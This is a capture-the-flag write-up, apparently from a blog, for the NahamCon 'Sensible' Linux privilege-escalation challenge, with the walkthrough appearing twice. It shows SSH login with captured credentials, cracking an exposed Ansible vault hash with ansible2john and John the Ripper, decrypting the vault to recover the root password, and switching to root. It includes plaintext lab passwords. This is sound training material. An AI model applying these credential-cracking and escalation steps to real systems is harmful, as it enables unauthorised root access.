NahamCon0212 CTF - Sensible - Writeup
Introduction
First, we authenticate into the system using leo's credentials which we captured in a previous challenge:
ssh -p 30010 leo@challenge.nahamcon.com
input password: constelleorising
After some enumeration, we find that there is an interesting file in the /opt/playbooks directory:
cd /opt/playbooks
ls
This implies that Ansible is indeed installed on this system. Let's take a look at the getinfo.yaml file:
cat getinfo.yaml
We see that there is a hash for the Ansible vault here. We can crack this hash after converting it into a format that John the Ripper can use. First we copy this portion of the file into a file on our attacking system:
From attacking system:
gedit sensibleHash.txt
Note that we're eliminating the spaces at the start of each line. Next we run the ansible2john.py script on sensibleHash.txt and output sensHash4John.txt:
python /usr/share/john/ansible2john.py sensibleHash.txt > sensHash4John.txt
Since we use Windows for John the Ripper, we'll take the output of sensHash4John.txt and create the same file in our Windows system, then pass the sensHash4John.txt file to John the Ripper with rockyou.txt as a wordlist:
john sensHash4John.txt -wordlist=rockyou.txt
So we've cracked the Ansible vault password for the Sensible system (starlight). This forum thread details how to decrypt a file in the Ansible vault:
https://stackoverflow.com/questions/43467180/how-to-decrypt-string-with-ansible-vault-2-3-0/45107666#45107666
So, according to the information in that thread, we can obtain the contents of the Ansible vault with the following command:
echo '$ANSIBLE_VAULT;1.1;AES256
32313438363938386263306136303839653830363838326466313566393330616130303861643363
3463623464306163343466393338336365656436386333320a306664343239666634316636633630
63633031396233366539616265633161346637626435363732333637663336363338346536643834
6666653830363637390a636566663836363062326535356164396162373331313662326663613532
32303062323465313035313361393962333163306462313865313165393034363832' | ansible-vault decrypt && echo
input password: starlight
This is the root password. Let's switch to that account:
su
input: il0vec0nst311at10ns
Finally, we access the flag file:
cat /root/flag.txt
Summary
Upon enumeration of the system, we discovered that the Ansible software was installed and we were able to locate an exposed file which contained Ansible an vault hash. After obtaining the password for the Ansible vault by cracking the hash, we were able to access the contents of the vault, which was the root password. We then switched users to the root account and captured our objective flag file.
Finish
Today we're doing a CTF writeup for the Sensible challenge from the NahamCon2021 CTF. Sensible is a Linux PrivEsc challenge, and after we start the challenge we received a string we can use to interact with the challenge:
First, we authenticate into the system using leo's credentials which we captured in a previous challenge:
ssh -p 30010 leo@challenge.nahamcon.com
input password: constelleorising
After some enumeration, we find that there is an interesting file in the /opt/playbooks directory:
cd /opt/playbooks
ls
This file, and the /playbooks directory's presence on the system points to this system running the Ansible configuration management program. We will try to confirm this:
which ansible
This implies that Ansible is indeed installed on this system. Let's take a look at the getinfo.yaml file:
cat getinfo.yaml
We see that there is a hash for the Ansible vault here. We can crack this hash after converting it into a format that John the Ripper can use. First we copy this portion of the file into a file on our attacking system:
From attacking system:
gedit sensibleHash.txt
Note that we're eliminating the spaces at the start of each line. Next we run the ansible2john.py script on sensibleHash.txt and output sensHash4John.txt:
python /usr/share/john/ansible2john.py sensibleHash.txt > sensHash4John.txt
Since we use Windows for John the Ripper, we'll take the output of sensHash4John.txt and create the same file in our Windows system, then pass the sensHash4John.txt file to John the Ripper with rockyou.txt as a wordlist:
john sensHash4John.txt -wordlist=rockyou.txt
So we've cracked the Ansible vault password for the Sensible system (starlight). This forum thread details how to decrypt a file in the Ansible vault:
https://stackoverflow.com/questions/43467180/how-to-decrypt-string-with-ansible-vault-2-3-0/45107666#45107666
So, according to the information in that thread, we can obtain the contents of the Ansible vault with the following command:
echo '$ANSIBLE_VAULT;1.1;AES256
32313438363938386263306136303839653830363838326466313566393330616130303861643363
3463623464306163343466393338336365656436386333320a306664343239666634316636633630
63633031396233366539616265633161346637626435363732333637663336363338346536643834
6666653830363637390a636566663836363062326535356164396162373331313662326663613532
32303062323465313035313361393962333163306462313865313165393034363832' | ansible-vault decrypt && echo
input password: starlight
This is the root password. Let's switch to that account:
su
input: il0vec0nst311at10ns
Finally, we access the flag file:
cat /root/flag.txt
Summary
Upon enumeration of the system, we discovered that the Ansible software was installed and we were able to locate an exposed file which contained Ansible an vault hash. After obtaining the password for the Ansible vault by cracking the hash, we were able to access the contents of the vault, which was the root password. We then switched users to the root account and captured our objective flag file.
Finish
Comments
Post a Comment